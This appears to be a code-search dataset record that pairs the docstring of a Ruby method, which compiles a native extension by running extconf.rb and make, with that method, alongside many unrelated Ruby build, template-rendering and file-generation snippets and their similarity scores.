"def generate\n proxy_hpp = Generation.render_template \"proxies\", \"Task.hpp\", binding\n proxy_cpp = Generation.render_template \"proxies\", \"Task.cpp\", binding\n file_proxy_hpp = Generation.save_automatic \"proxies\", \"#{task.basename}.hpp\", proxy_hpp\n file_proxy_cpp = Generation.save_automatic \"proxies\", \"#{task.basename}.cpp\", proxy_cpp\n\n cmake = Generation.render_template 'proxies', 'CMakeLists.txt', binding\n Generation.save_automatic('proxies', \"CMakeLists.txt\", cmake)\n \n pc = Generation.render_template \"proxies\", \"proxies.pc\", binding\n Generation.save_automatic \"proxies\", \"#{project.name}-proxies.pc.in\", pc\n end",
"def generate\n gen_app\n handle_public_index\n gen_file(\"config/routes.rb\", \"routes\")\n @app.goals.values.each_with_index { |goal, i| gen_goal(goal, i) }\n gen_misc\n self\n end",
"def generate\n puts @root\n \n puts \"Processing files ...\"\n start_time = Time.now\n puts \"start --\"\n\n # getting list of committers\n puts \"Getting list of committers ...\"\n @committers = `git log --raw | grep \"^Author:\" | sort | uniq | sed -e 's/^Author: //g' -e 's/<.*//g'`.split(\"\\n\")\n @committers.uniq!\n\n # creaing an html file\n html_composer = HtmlComposer.new(@root, @report_path)\n html_composer.write_html_header\n\n files = FileList.new() do |f|\n @excluded_files.each { |e| \n f.exclude(e)\n puts \"Excluded #{e}\" \n }\n end\n @included_files.each do |i|\n files.add(i)\n end\n\n FileUtils.mkdir_p \"#{@root}/gs_temp\"\n Parallel.each(files, :in_processes => @config[:in_processes]) do |path|\n process_file(html_composer, path)\n end\n FileUtils.rm_r \"#{@root}/gs_temp\"\n\n # closing the html file\n html_composer.write_html_footer\n\n puts \"\"\n puts \"-- end\"\n\n elapsed_time = (Time.now - start_time).round(2)\n puts \"Processed in #{elapsed_time} secs\"\n end",
"def generate!\n generator.invoke_all\n end",
"def compile\n Milkrun.say \"Cleaning and assembling a new #{task} build\"\n `./gradlew clean assemble#{task}`\n @assembled = true\n Milkrun.say \"Package built to #{path}\"\n path\n end",
"def generate\n template_dir = File.join(File.dirname(__FILE__), \"../templates\")\n proxy_hpp = Generation.render_template template_dir, \"proxies\", \"Task.hpp\", binding\n proxy_cpp = Generation.render_template template_dir, \"proxies\", \"Task.cpp\", binding\n file_proxy_hpp = Generation.save_automatic(project.name, \"/proxies\", \"#{task.basename}.hpp\", proxy_hpp)\n file_proxy_cpp = Generation.save_automatic(project.name, \"/proxies\", \"#{task.basename}.cpp\", proxy_cpp)\n\n forward_hpp = Generation.render_template template_dir, \"proxies\", \"Forward.hpp\", binding\n file_forward_hpp = Generation.save_automatic(project.name, \"proxies\", \"#{task.basename}Forward.hpp\", forward_hpp)\n\n cmake = Generation.render_template template_dir, 'proxies', 'CMakeLists.txt', binding\n Generation.save_automatic(project.name, 'proxies', \"CMakeLists.txt\", cmake)\n \n pc = Generation.render_template template_dir, \"proxies\", \"proxies.pc\", binding\n Generation.save_automatic(project.name, \"proxies\", \"#{project.name}-proxies.pc.in\", pc)\n end",
"def generate\n end",
"def writeCompiledXMLFile(tokens, classNames, outFile)\n str = compileClass(tokens, classNames)\n str = tabXMLTags(str)\n xmlFile = File.new(outFile, \"w\")\n\n\n xmlFile.syswrite(str)\nend",
"def generate_data!\n start_dir = Dir.pwd\n \n Dir.chdir tool_path\n system \"./generate -pc #{product_factor} -fn #{filename} -fc\"\n ensure\n Dir.chdir start_dir\n end",
"def build()\n \n #check dir exists, if not, make it\n if(!File.exists?(@path))\n Dir.mkdir(@path)\n end\n \n #build directory structure\n puts 'Building directory structure'\n build_skeleton(@template.directory_structure)\n \n #execute build tasks\n puts 'Running build tasks'\n execute_tasks(@template.tasks,@template.path)\n \n puts 'Skeleton built'\n \n end",
"def gen_dir\n File.join(root_path, 'generated')\n end",
"def generate\n puts \"current path should be: \" + PATH_SCRIPT + \"/core\"\n result = false\n Dir.chdir(PATH_SCRIPT+\"/core\") do\n result = call_system_command(CMD_BUILD_GENERATE)\n puts \"generating source code failed, and return #{result}.\" unless result\n end\n Dir.chdir(PATH_SCRIPT+\"/is\") do\n result = system(CMD_BUILD_GENERATE)\n puts \"generating source code failed, and return #{result}.\" unless result\n end\n return result\n end",
"def genFileContent(cls, bld)\n\n # Add in any dependencies required by functions\n for fun in cls.functions\n if fun.elementId == CodeElem::ELEM_FUNCTION\n if fun.isTemplate\n templ = XCTEPlugin::findMethodPlugin(\"csharp\", fun.name)\n if templ != nil\n templ.process_dependencies(cls, bld, fun)\n else\n puts \"ERROR no plugin for function: \" + fun.name + \" language: csharp\"\n end\n end\n end\n end\n\n Utils.instance.genUses(cls.uses, bld)\n\n # Process namespace items\n if cls.namespace.hasItems?()\n bld.startBlock(\"namespace \" << cls.namespace.get(\".\"))\n end\n\n classDec = cls.model.visibility + \" interface \" + Utils.instance.getStyledClassName(cls.name)\n\n for par in (0..cls.baseClassModelManager.size)\n if par == 0 && cls.baseClasses[par] != nil\n classDec << \" : \" << cls.baseClasses[par].visibility << \" \" << cls.baseClasses[par].name\n elsif cls.baseClasses[par] != nil\n classDec << \", \" << cls.baseClasses[par].visibility << \" \" << cls.baseClasses[par].name\n end\n end\n\n bld.startClass(classDec)\n\n bld.endClass\n\n # Process namespace items\n if cls.namespace.hasItems?()\n bld.endBlock(\" // namespace \" + cls.namespace.get(\".\"))\n bld.add\n end\n end",
"def generate(scripts)\n require 'uncool/app'\n\n app = App.new(options)\n\n output = app.generate(scripts)\n\n $stdout.puts(output)\n end",
"def write_java\n puts \"Creating java file\"\n j = \"\n package #{ @pkg };\n\n import android.app.Activity;\n import android.os.Bundle;\n import com.phonegap.*;\n\n public class #{ @name.gsub(' ','') } extends DroidGap\n {\n @Override\n public void onCreate(Bundle savedInstanceState)\n {\n super.onCreate(savedInstanceState);\n super.loadUrl(\\\"file:///android_asset/www/index.html\\\");\n }\n }\n \"\n code_dir = File.join(@output_dir, \"src\", @pkg.gsub('.', File::SEPARATOR))\n FileUtils.mkdir_p(code_dir)\n open(File.join(code_dir, \"#{ @name.gsub(' ','') }.java\"),'w') { |f| f.puts j.gsub(' ','') }\n end",
"def write_project_packages\n puts \"Processing project\"\n\n def package_name_from_file(file)\n dirs = File.dirname(file).split(\"/\").reverse\n i = dirs.index(\"src\") || dirs.index(\"tests\") || dirs.index(\"model-src\")\n i && dirs[0..i-1].reverse.join(\".\")\n end\n\n project_classes = []\n Find.find(Dir.pwd) do |file|\n if File.expand_path(file) == File.expand_path(\"project\")\n Find.prune\n elsif file =~ /.*\\.scala$/ then\n IO.readlines(file).each do |line|\n if line =~ /\\s*(class|trait|object)\\s*(\\w+)\\s*(private)?\\s*(((extends)|(with))\\s+\\w+\\s*)*(\\{|\\[|\\(|$)/ then\n if package_name_from_file(file) then \n project_classes << [$2, package_name_from_file(file)]\n end\n end\n end\n end\n end\n\n File.open($project_packages_file, \"w\") do |f|\n project_classes.uniq.each do |x|\n klass, pckg = x\n f.puts(\"#{klass}\\t#{pckg}\")\n end\n end\nend",
"def build(ostream = nil)\n if File.exists? root(:output)\n raise Errno::EEXISTS unless File.directory? root(:output)\n else\n Dir.mkdir root(:output)\n end\n\n begin\n all.each do |page|\n ostream << \" * #{page.output_path}\\n\" if ostream\n\n begin\n rendered = page.render\n force_file_open(page.output_path) { |file| file << rendered }\n\n rescue RenderError => e\n ostream << \" *** Error: #{e.to_s}\".gsub(\"\\n\", \"\\n *** \") << \"\\n\"\n end\n end\n\n rescue NoGemError => e\n ostream << \" *** Error: #{e.message}\\n\"\n end\n end",
"def save\n require 'yaml'\n File.open(output_file, 'w') { |f| f.puts(generate.to_yaml) }\n end",
"def dump(production = false)\n FileUtils.mkdir(@output_folder)\n puts \"\\nFrank is...\"\n puts \" - \\033[32mCreating\\033[0m '#{@output_folder}'\"\n \n compile_templates(production)\n copy_static\n puts \"\\n \\033[32mCongratulations, project dumped to '#{@output_folder}' successfully!\\033[0m\"\n end",
"def generate_help_project\n # Set which files should actually be generated\n @generated_files = @files.select { |f| f.text? }\n\n debug_msg \"Generating the help project files\"\n generate_file_index\n generate_class_index\n generate_project_file\n generate_contents\n generate_chm_index\n compile_project\n end",
"def generate_index_files\n @folders.each do |folder, files|\n puts \" + Creating #{@dest}/#{folder}/index.html\" if @verbose\n File.open(\"#{@dest}/#{folder}/index.html\", \"w\") do |index|\n title = \"Rails Plug-in for #@name #@version\"\n index.write(\"<html><head><title>#{title}</title></head>\\n\")\n index.write(\"<body>\\n\")\n index.write(\"<h2>#{title}</h2>\\n\")\n extra_links = create_extra_links()\n index.write(\"<p>#{extra_links}</p>\\n\") if extra_links \n files.each { |fn|\n puts(\" - Adding #{fn}\") if @verbose\n index.write(\" <a href=\\\"#{fn}\\\">#{fn}</a><br/>\\n\")\n }\n index.write(\"<hr size=\\\"1\\\"/><p style=\\\"font-size: x-small\\\">Generated with RailsPluginPackageTask<p>\")\n index.write(\"</body>\\n\")\n index.write(\"</html>\\n\")\n end\n end\n end",
"def generate_index_files\n @folders.each do |folder, files|\n puts \" + Creating #{@dest}/#{folder}/index.html\" if @verbose\n File.open(\"#{@dest}/#{folder}/index.html\", \"w\") do |index|\n title = \"Rails Plug-in for #@name #@version\"\n index.write(\"<html><head><title>#{title}</title></head>\\n\")\n index.write(\"<body>\\n\")\n index.write(\"<h2>#{title}</h2>\\n\")\n extra_links = create_extra_links()\n index.write(\"<p>#{extra_links}</p>\\n\") if extra_links\n files.each { |fn|\n puts(\" - Adding #{fn}\") if @verbose\n index.write(\" <a href=\\\"#{fn}\\\">#{fn}</a><br/>\\n\")\n }\n index.write(\"<hr size=\\\"1\\\"/><p style=\\\"font-size: x-small\\\">Generated with RailsPluginPackageTask<p>\")\n index.write(\"</body>\\n\")\n index.write(\"</html>\\n\")\n end\n end\n end",
"def write(new_files)\n case settings[:style]\n when :classic\n # Single file\n printf \"Writing classic app to: %s\\n\", settings[:output_file]\n File.open(settings[:output_file], 'w') do |f|\n #f << \"##\\n\"\n #f << \"# Generated by \\\"rake #{ARGV * ' '}\\\"\\n\"\n #f << \"# Keep up to date: #{PLUGIN_URL}\\n\"\n #f << \"#\\n\"\n new_files.each do |file|\n f << \"\\n# #{file.first.sub(/\\.rb$/,'').humanize}\\n\"\n f << file.last\n end\n end\n when :modular\n # Separate files\n new_files.each do |file|\n filename = \"#{settings[:output_dir]}/#{file.first}\"\n printf \" write %-40s\\n\", filename\n File.open(filename, 'w') do |f|\n #f << \"##\\n\"\n #f << \"# Generated by \\\"rake #{ARGV * ' '}\\\"\\n\"\n #f << \"# Keep up to date: #{PLUGIN_URL}\\n\"\n #f << \"#\\n\"\n f << \"class #{settings[:class_name]}\\n\"\n f << file.last\n f << \"end\\n\" \n end\n end\n else\n raise \"Invalid style for Sinatra::FromRails: #{settings[:style]} (must be :classic or :modular)\"\n end\n end",
"def gen_sub_directories\n @outputdir.mkpath\n end",
"def generate\n generate_header\n generate_content\n #not_dirty\n end",
"def genFileContent(cls, bld)\r\n\r\n # Add in any dependencies required by functions\r\n for fun in cls.functions\r\n if fun.elementId == CodeElem::ELEM_FUNCTION\r\n if fun.isTemplate\r\n templ = XCTEPlugin::findMethodPlugin(\"csharp\", fun.name)\r\n if templ != nil\r\n templ.process_dependencies(cls, bld, fun)\r\n else\r\n puts \"ERROR no plugin for function: \" + fun.name + \" language: csharp\"\r\n end\r\n end\r\n end\r\n end\r\n\r\n cls.addUse(\"System.Data.SqlClient\")\r\n\r\n Utils.instance.genUses(cls.uses, bld)\r\n Utils.instance.genNamespaceStart(cls.namespace, bld)\r\n\r\n classDec = cls.model.visibility + \" class \" + getClassName(cls) + \"Controller\"\r\n\r\n classDec << \" : ApiController\"\r\n\r\n for par in (0..cls.baseClassModelManager.size)\r\n if cls.baseClasses[par] != nil\r\n classDec << \", \" << cls.baseClasses[par].visibility << \" \" << cls.baseClasses[par].name\r\n end\r\n end\r\n\r\n bld.startClass(classDec)\r\n\r\n if (cls.functions.length > 0)\r\n bld.add\r\n end\r\n\r\n # Generate code for functions\r\n for fun in cls.functions\r\n if fun.elementId == CodeElem::ELEM_FUNCTION\r\n if fun.isTemplate\r\n templ = XCTEPlugin::findMethodPlugin(\"csharp\", fun.name)\r\n if templ != nil\r\n templ.get_definition(cls, bld, fun)\r\n else\r\n puts \"ERROR no plugin for function: \" + fun.name + \" language: csharp\"\r\n end\r\n else # Must be empty function\r\n templ = XCTEPlugin::findMethodPlugin(\"csharp\", \"method_empty\")\r\n if templ != nil\r\n templ.get_definition(cls, bld)\r\n else\r\n #puts 'ERROR no plugin for function: ' + fun.name + ' language: csharp'\r\n end\r\n end\r\n end\r\n end # class + cls.getUName()\r\n bld.endClass\r\n\r\n Utils.instance.genNamespaceEnd(cls.namespace, bld)\r\n end",
"def finish\n if @write_options then\n write_options\n exit\n end\n\n @op_dir ||= 'doc'\n\n @rdoc_include << \".\" if @rdoc_include.empty?\n root = @root.to_s\n @rdoc_include << root unless @rdoc_include.include?(root)\n\n @exclude = self.exclude\n\n finish_page_dir\n\n check_files\n\n # If no template was specified, use the default template for the output\n # formatter\n\n unless @template then\n @template = @generator_name\n @template_dir = template_dir_for @template\n end\n\n if @locale_name\n @locale = RDoc::I18n::Locale[@locale_name]\n @locale.load(@locale_dir)\n else\n @locale = nil\n end\n\n self\n end",
"def compile\n tmpdir = Dir.mktmpdir\n Dir.chdir(tmpdir) do |source_dir, build_dir|\n yield source_dir, @build_dir\n end\n\n puts \"Packaging the following files/dirs:\"\n pipe \"ls #{@build_dir}\"\n ensure\n if ENV['DEBUG']\n puts \"Source dir: #{tmpdir}\"\n else\n FileUtils.rm_rf(tmpdir)\n end\n end",
"def gen_sub_directories\n\t\t@outputdir.mkpath\n\tend",
"def gen_sub_directories\n\t\t@outputdir.mkpath\n\tend",
"def generate\n classes = registry.all(:class)\n classes.each do |c|\n data = methods(c)\n output(data, c.to_s)\n end\n end",
"def generate_files\n copy_file 'queued_task.rb', \"app/models/#{name}.rb\"\n end",
"def gen\n with_output_to @fn do\n pp \"require 'spqr/spqr'\"\n pp \"require 'spqr/app'\"\n\n pp \"\"\n\n @scs.each do |sc|\n pp(\"require '#{sc.package.gsub(/[.]/, '/')}/#{sc.name}'\")\n end\n\n \n pp \"\"\n \n pp \"app = SPQR::App.new(:loglevel => :debug)\"\n \n klass_list = @scs.collect do |sc|\n (sc.package.split(\".\").collect{|pkg| pkg.capitalize} << sc.name).join(\"::\")\n end\n \n pp \"app.register #{klass_list.join ','}\"\n \n pp \"\"\n\n pp \"app.main\"\n end\n end",
"def generate_files\n ip = local_ip\n version = Farmstead::VERSION\n scaffold_path = \"#{File.dirname __FILE__}/scaffold\"\n scaffold = Dir.glob(\"#{scaffold_path}/**/*.erb\", File::FNM_DOTMATCH)\n scaffold.each do |file|\n basename = File.basename(file)\n folderstruct = file.match(\"#{scaffold_path}/(.*)\")[1]\n if basename != folderstruct\n foldername = File.dirname(folderstruct)\n create_recursive(\"#{@name}/#{foldername}\")\n end\n projectpath = \"#{@name}/#{folderstruct}\".chomp(\".erb\")\n template = File.read(file)\n results = ERB.new(template).result(binding)\n copy_to_directory(results, projectpath)\n end\n end",
"def create_source_files\n empty_directory(File.join(target_dir, \"lib/kitchen/driver\"))\n\n create_template(\n \"version.rb.erb\",\n \"lib/kitchen/driver/#{name}_version.rb\"\n )\n create_template(\n \"driver.rb.erb\",\n \"lib/kitchen/driver/#{name}.rb\"\n )\n end",
"def generate(destination)\n destination = Pathname(destination).expand_path\n # First, we find all of the renderable files in the project and iterate over that list.\n #\n # Next, we create a [Page](./soundwave/page.html) object for each file and write it to\n # the destination path.\n find_paths.each do |path|\n page = Page.new(self, path)\n page.write(destination.join(page.output_path))\n end\n end",
"def generate\n po = extract_messages\n pot_path = 'rdoc.pot'\n File.open(pot_path, \"w\") do |pot|\n pot.print(po.to_s)\n end\n end",
"def build\n system(\"make build\", :chdir => self.config['destination'], :out => :err)\n end",
"def build\n entries = Dir.entries(@input_dir)\n entries.delete_if {|e| @exclude.include?(e)}\n FileUtils.rm_f(@output_file) # Make sure file doesn't exist\n ::Zip::File.open(@output_file, ::Zip::File::CREATE) do |zipfile|\n write_entries entries, '', zipfile\n end\n end",
"def maybe_generate\n return if @generated\n puts \"\\nGenerating byte_code image\" if Rake.verbose\n # image=[] # TBR?\n @memloc=0\n def_list=@dictionary.values.map{|v| v.definitions}.flatten.reject{|d| d.primitive?}\n def_list.each do |d|\n begin\n code=[]\n cdef=MFCompiledDefinition.new\n cdef.location=@memloc\n cdef.definition=d\n cdef.flags=(cdef.definition.definer == \"SYNTAX:\" ? 1 : 0)\n @compiled_definitions << cdef # adding here already although body may be empty\n # determine code size beforehand to get offset for data segment of definition\n defsize=d.code.body.map{|w| element_size(w)}.reduce(:+) +1 # final qend\n @data=[]\n @data_counter=@memloc+defsize # initialize data segment counter\n puts \"compiling definition for #{d.name}\" if Rake.verbose == true\n d.code.body.each do |word|\n word_bytecode(word,code)\n end\n code << prim(:qend)\n puts \"#{d.name} is at #{@memloc}\" if Rake.verbose == true\n @memloc += (defsize + @data.length)\n cdef.code=code+@data\n rescue\n puts \"failed to compile definition:\"\n puts \"ERROR:#{d.err_loc}: #{d.see}\"\n raise\n end\n end\n @size=@memloc\n puts \"total bytecode size: #{@memloc}\" if Rake.verbose\n puts \"memory map:\" if Rake.verbose == true\n @compiled_definitions.each do |d|\n puts \"@#{d.location}: #{d.definition.name} #{d.definition.primitive? ? 'prim' : '' }\"\n print d.code\n puts \";\" if d.code\n end if Rake.verbose == true\n print ISET.keys.map{ |name| [name,prim(name)] },\"\\n\" if Rake.verbose == true\n # need to actually generate the dictionary here, and do a second pass substituting all wrapped words\n calculate_dict_entries\n # replace all placeholders with dictionary offsets\n @compiled_definitions.each do |cdef|\n cdef.code.each_with_index do |w,i|\n case w\n when Array\n if w[0] == :dict_address\n puts \"replacing placeholder in '#{cdef.definition.name}'\" if Rake.verbose == true\n addr = @dict_positions[w[1]]\n raise \"cannot get address of word '#{w[1]}'\" unless addr\n cdef.code[i,cell_width]=int_bytes(addr,cell_width)\n elsif w[0] == :deferred\n # CAVEAT: this here works by looking up the definition by name! for\n # non-unique naming case, there must be a different way to get from the deferred definition to the actual definition\n puts \"replacing deffered definition in '#{cdef.definition.name}'\" if Rake.verbose == true\n actual_def = (@compiled_definitions.find{|cdef|\n # puts \"checking #{cdef.definition.name}(#{cdef.definition.object_id}) against #{w[1].name}(#{w[1].object_id})\"\n cdef.definition.name==w[1].name})\n raise \"no actual definition found for deferred definition\" unless actual_def\n cdef.code[i,2]=int_bytes(actual_def.location,2)\n else\n raise \"dunno what to do with #{w}\"\n end\n end\n end\n end\n check_locations\n @generated = true\n # @compiled_definitions.map{|d| d.code}.flatten\n end",
"def output_path\n \"build\"\n end",
"def create_output_files\n return unless @option_output_path\n return if @collected_nodes.empty?\n @collected_nodes.each do |certname, properties|\n next if properties['settings'].empty?\n output_file = \"#{@option_output_path}/nodes/#{certname}.yaml\"\n File.write(output_file, properties['settings'].to_yaml)\n output(\"## Wrote Hiera YAML file: #{output_file}\\n\\n\")\n end\n return if @common_settings.empty?\n output_file = \"#{@option_output_path}/common.yaml\"\n File.write(output_file, @common_settings.to_yaml)\n end",
"def run\n puts \"\\nHere we go!\\n\\n\"\n make_output_directory\n build_jar\n create_android\n include_www\n generate_manifest\n copy_libs\n add_name_to_strings\n write_java\n puts \"\\nDone!\\n\\n\"\n `open #{@output_dir}`\n end",
"def generate(files) \n # Each object passed in is a file, process it\n @comments = []\n @containers = []\n @objects = []\n @methods = []\n files.each { |file| process_file(file) }\n (@previous_comments - @comments).each {|id| CodeComment.find(id).destroy }\n (@previous_objects - @objects).each {|id| CodeObject.find(id).destroy }\n (@previous_methods - @methods).each {|id| CodeMethod.find(id).destroy }\n (@previous_containers - @containers).each {|id| CodeContainer.find(id).destroy }\n end",
"def export!\n verify_overwriting if File.exist?(Frank.export.path)\n FileUtils.mkdir(Frank.export.path)\n\n unless Frank.silent_export?\n puts \"\\nFrank is...\"\n puts \" - \\033[32mCreating\\033[0m '#{Frank.export.path}'\"\n end\n\n compile_templates\n copy_static\n if Frank.compress?\n begin\n require 'yui/compressor'\n rescue\n puts \"You need to install the yui-compressor gem to enable compression\"\n end\n end\n\n if Frank.production?\n package_stylesheets\n package_javascripts\n end\n\n\n puts \"\\n \\033[32mCongratulations, project dumped to '#{Frank.export.path}' successfully!\\033[0m\" unless Frank.silent_export?\n end",
"def write_transform_file\n render_template(resource_path(\"doc-transform.erb\"),\n destination: transform_file,\n variables: {\n pathdir: project.install_dir.split(\"/\")[1],\n })\n end",
"def generate\n save\n end",
"def build()\n HP.logger.debug(\"~ Build Mode: #{build_mode}\")\n HP.logger.debug(\"~ Source Root: #{source_root}\")\n HP.logger.debug(\"~ Build Root: #{build_root}\")\n build_entries(entries())\n end",
"def generate\n @to_copy = @git.ls_files.keys - ['README', 'README.md', 'README.markdown', 'generate.rb', '.gitignore']\n\n code_path = src_path('generate.rb')\n if File.exists?(code_path)\n eval(File.read(code_path), binding, code_path)\n end\n\n interpolate(@to_copy.select {|path| path =~ /\\.erb\\z/})\n copy @to_copy\n end",
"def execute!\n make_web_directory\n generate_universe\n generate_html\n print_success_message\n end",
"def output_path; end",
"def generate(file_name,template,map, overwrite = true)\r\n # make sure the package folder exists\r\n pkg_path = (map['package'] || '').gsub('.','/') \r\n FileUtils.makedirs \"#{target}/#{pkg_path}\"\r\n File.open(\"#{target}/#{pkg_path}/#{file_name}\",'w') do |f|\r\n f << self.process_template(template,map)\r\n log \">> writing #{f.path}\"\r\n end #file\r\n end",
"def generate_bulk_export\n # Delete the bulk_export directory if it exists.\n FileUtils.rm_rf(\"bulk_export\")\n\n get_all_insurance_plans\n get_all_location_resources\n p \"===============================================================\"\n p \"Creating the Bulk export folder output ...\"\n generate_payer_bulk_data\n generate_formulary_bulk_data\nend",
"def gen_sub_directories\n FileUtils.mkdir_p RDoc::Generator::FILE_DIR\n FileUtils.mkdir_p RDoc::Generator::CLASS_DIR\n rescue\n $stderr.puts $!.message\n exit 1\n end",
"def gen_sub_directories\n FileUtils.mkdir_p RDoc::Generator::FILE_DIR\n FileUtils.mkdir_p RDoc::Generator::CLASS_DIR\n rescue\n $stderr.puts $!.message\n exit 1\n end",
"def write_models_to_file\n Printer.new(models, @output_dir).tap do |p|\n p.write\n end\n end",
"def write\n ::Zip::File.open(@output_file, ::Zip::File::CREATE) do |io|\n @folders.each do |input_dir, src, dest|\n src = '' if src == '/**' # the whole src directory could be specified by /**\n path = source_dir(File.join(input_dir, src))\n write_entries(path, entries(src, input_dir), dest, io)\n end\n end\n\n @output_file\n end",
"def writeCompiledFile(tokens, classNames, outFile)\n resultList = compileClass2(tokens, classNames)\n str = resultList[0]\n classTable = resultList[1]\n methodsTableList = resultList[2]\n vmFile = File.new(outFile, \"w\")\n\n vmFile.syswrite(str)\n\n #will print the symbol tables commented out in the vm file\n str = \"\\n\\n//class symbol table\\n\" + classTable.printTable+\"\\n\\n\"\n for i in 0..methodsTableList.size-1\n str += \"//method's symbol table\\n\" + methodsTableList[i].printTable+\"\\n\\n\"\n end\n\n vmFile.syswrite(str)\nend",
"def generate()\n\t\t\t@out = []\n\t\t\t@context = []\n\n\t\t\ttrim_nil_lines\n\n\t\t\t@lines.each_with_index do |line, i|\n\t\t\t\twrite_with_context(line.line, line.context, next_context(i))\n\t\t\tend\n\t\t\twrite_with_context(nil, [], [])\n\t\t\treturn @out.join\n\t\tend",
"def generate_class_and_module_files\n template_file = @template_dir + 'class-page.html.erb'\n debug_msg \"Generating class documentation\"\n @unique_classes_and_modules.each do |klass|\n debug_msg \" %s %s\" % [klass.type, klass.full_name]\n outfile = @output_dir + klass.path\n @class = klass\n self.render_template(template_file, binding(), outfile)\n end\n end",
"def write( destination=nil )\n\t\tstart = Time.now\n\t\t\n\t\tsource = @bundle.source\n\t\t@html_path = destination || File.dirname(source)/\"#{File.basename source}_html\"\n\t\tFileUtils.rm_rf(@html_path) if File.exists?(@html_path)\n\t\tFileUtils.mkdir(@html_path)\n\t\t\n\t\tmaster_templates = DocuBot::TEMPLATE_DIR\n\t\tsource_templates = source/'_templates'\n\t\tmaster_root = master_templates/'_root'\n\t\tsource_root = source_templates/'_root'\n\t\t\n\t\t# Copy any files found in the source directory that weren't made into pages\n\t\t@bundle.extras.each do |file|\n\t\t\tFileUtils.mkdir_p( @html_path / File.dirname( file ) )\n\t\t\tFileUtils.cp( source / file, @html_path / file )\n\t\tend\n\t\t\n\t\t# Copy files from template to root of destination\n\t\t# Record these as extras so that the CHMWriter can access them\n\t\tDir.chdir @html_path do\n\t\t\texisting_files = Dir[ '*' ]\n\t\t\tFileUtils.copy( Dir[ master_templates/'_root'/'*' ], '.' )\n\t\t\tFileUtils.copy( Dir[ source_templates/'_root'/'*' ], '.' )\n\t\t\tnew_files = Dir[ '*' ] - existing_files\n\t\t\t@bundle.extras.concat( new_files )\n\t\tend\n\t\t\n\t\tDir.chdir @html_path do\n\t\t\to = Object.new\n\t\t\t\n\t\t\t# Write out every page\n\t\t\ttop = File.exists?( source_templates/'top.haml' ) ? source_templates/'top.haml' : master_templates/'top.haml'\n\t\t\ttop = Haml::Engine.new( IO.read( top, encoding:'utf-8' ), HAML_OPTIONS )\n\t\t\t@bundle.toc.descendants.each do |node|\n\t\t\t\tnext if node.anchor\n\t\t\t\t\n\t\t\t\tcontents = node.page.to_html\n\t\t\t\ttemplate = node.page.template # Call page.to_html first to ensure page.template is set\n\n\t\t\t\tcustom_js = \"#{template}.js\"\n\t\t\t\tcustom_js = nil unless File.exists?( source_root/custom_js ) || File.exists?( master_root/custom_js )\n\t\t\t\t\n\t\t\t\tcustom_css = \"#{template}.css\"\n\t\t\t\tcustom_css = nil unless File.exists?( source_root/custom_css ) || File.exists?( master_root/custom_css )\n\t\t\t\t\n\t\t\t\tvariables = {\n\t\t\t\t\t:page => node.page,\n\t\t\t\t\t:contents => contents,\n\t\t\t\t\t:global => @bundle.global,\n\t\t\t\t\t:root => node.page.root,\n\t\t\t\t\t:breadcrumb => node.ancestors,\n\t\t\t\t\t:custom_js => custom_js,\n\t\t\t\t\t:custom_css => custom_css\n\t\t\t\t}\t\t\t\t\n\t\t\t\thtml = top.render( o, variables )\n\t\t\t\tFileUtils.mkdir_p( File.dirname( node.file ) )\n\t\t\t\tFile.open( node.file, 'w' ){ |f| f << html }\n\t\t\tend\n\n\t\t\tFile.open( 'glossary-terms.js', 'w' ){ |f| f << @bundle.glossary.to_js }\n\t\tend\n\t\t\n\t\tputs \"...%.2fs to write the HTML\" % (Time.now - start)\n\tend",
"def write_file\n\n File.open(\"rebuild.html\", \"w\") do |file|\n @write_array.each do |tags_and_text|\n file.write tags_and_text\n end\n end\n\n end"
] |
[
"0.70972645",
"0.7075406",
"0.70609",
"0.7046495",
"0.6902335",
"0.68874085",
"0.682245",
"0.6723369",
"0.65834737",
"0.64997",
"0.64838815",
"0.64687943",
"0.6456144",
"0.64551425",
"0.6446258",
"0.641912",
"0.641912",
"0.637711",
"0.63598377",
"0.63082594",
"0.6267121",
"0.6264465",
"0.6257129",
"0.6191254",
"0.61726844",
"0.61556715",
"0.61528933",
"0.614153",
"0.6122566",
"0.6113898",
"0.6113898",
"0.6113049",
"0.61061746",
"0.6095836",
"0.6083755",
"0.6068664",
"0.6064466",
"0.6060731",
"0.60587895",
"0.6040235",
"0.6040225",
"0.60204357",
"0.601315",
"0.6009672",
"0.60074306",
"0.60054594",
"0.6000375",
"0.59987444",
"0.5984116",
"0.59728944",
"0.59627455",
"0.59369916",
"0.5926166",
"0.5921108",
"0.5916481",
"0.59036",
"0.58986557",
"0.58914924",
"0.58891445",
"0.5882883",
"0.5878153",
"0.58748853",
"0.5868538",
"0.586497",
"0.5859698",
"0.5856983",
"0.5856329",
"0.5856329",
"0.5849629",
"0.5847285",
"0.5844046",
"0.5841638",
"0.5838851",
"0.58010936",
"0.57942224",
"0.5792726",
"0.5787995",
"0.5785429",
"0.5783064",
"0.5770565",
"0.57632643",
"0.576107",
"0.5759932",
"0.5759804",
"0.57475215",
"0.57442",
"0.57342553",
"0.5720875",
"0.5716976",
"0.57138",
"0.5713684",
"0.57029676",
"0.57029676",
"0.5694555",
"0.5679125",
"0.56707394",
"0.5663767",
"0.56621635",
"0.566138",
"0.5656596"
] |
0.6821065
|
7
|
Compile the extension. This will create an rbpp_compile.log file in +working_dir+. View this file to see the full compilation process including any compiler errors / warnings.
|
def compile
  Logger.info "Compiling. See rbpp_compile.log for details."
  require 'rbconfig'
  ruby = File.join(RbConfig::CONFIG["bindir"], RbConfig::CONFIG["RUBY_INSTALL_NAME"])
  FileUtils.cd @working_dir do
    system("#{ruby} extconf.rb > rbpp_compile.log 2>&1")
    system("rm -f *.so")
    system("make >> rbpp_compile.log 2>&1")
  end
  Logger.info "Compilation complete."
end
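
A minimal invocation sketch (hedged: the ExtensionBuilder class name and the "ext" directory below are illustrative assumptions, not taken from this entry; only #compile itself appears above):

# hypothetical caller for the method above
builder = ExtensionBuilder.new("ext")  # assumed class whose constructor sets @working_dir
builder.compile                        # runs extconf.rb and make, logging to ext/rbpp_compile.log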
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def compile\n Dir.chdir(build_path) do\n do_compile\n end\n end",
"def compile\n end",
"def build\n raise ConfigurationError.new(\"Must specify working directory\") unless @working_dir\n raise ConfigurationError.new(\"Must specify which sources to wrap\") unless @parser\n\n Logger.info \"Beginning code generation\"\n\n @builder = Builders::ExtensionNode.new(@name, @node || @parser, @modules)\n @builder.add_includes @options[:includes]\n @builder.build\n @builder.sort\n\n Logger.info \"Code generation complete\"\n end",
"def compile_exec()\n compile\n exec\n end",
"def compile(mod); end",
